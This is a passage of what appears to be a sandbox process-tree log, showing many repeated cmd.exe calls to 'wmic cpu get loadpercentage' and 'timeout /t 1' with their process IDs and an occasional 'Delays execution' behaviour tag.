  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4792
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2756
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4640
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3496
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4456
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4424
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4392
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:676
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1264
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:728
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:804
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3332
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:656
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4572
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4504
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4632
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4668
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3600
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2828
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2844
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4336
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1236
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1540
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2472
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1108
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1252
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4204
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4344
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:456
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1856
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2652
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3784
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3312
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:380
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1284
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4652
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2620
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2516
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2276
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1680
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1192
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1380
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2372
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4796
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4172
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:904
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2576
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1416
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3148
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:992
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1732
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:640
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3216
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3596
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1492
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2296
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1780
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4604
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2336
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2052
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2520
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2400
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3388
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3636
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3644
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1992
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1392
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4944
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2352
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4476
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2876
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2756
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1052
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5080
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4424
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4392
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1892
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2028
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4360
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1596
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4728
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4892
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1516
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2180
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3788
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4736
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1184
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2268
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4308
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1492
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2844
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2296
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1780
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2332
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1744
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2336
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4300
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3636
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2652
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3644
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3348
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:624
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4576
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3312
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4656
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2756
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1092
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4352
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:180
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
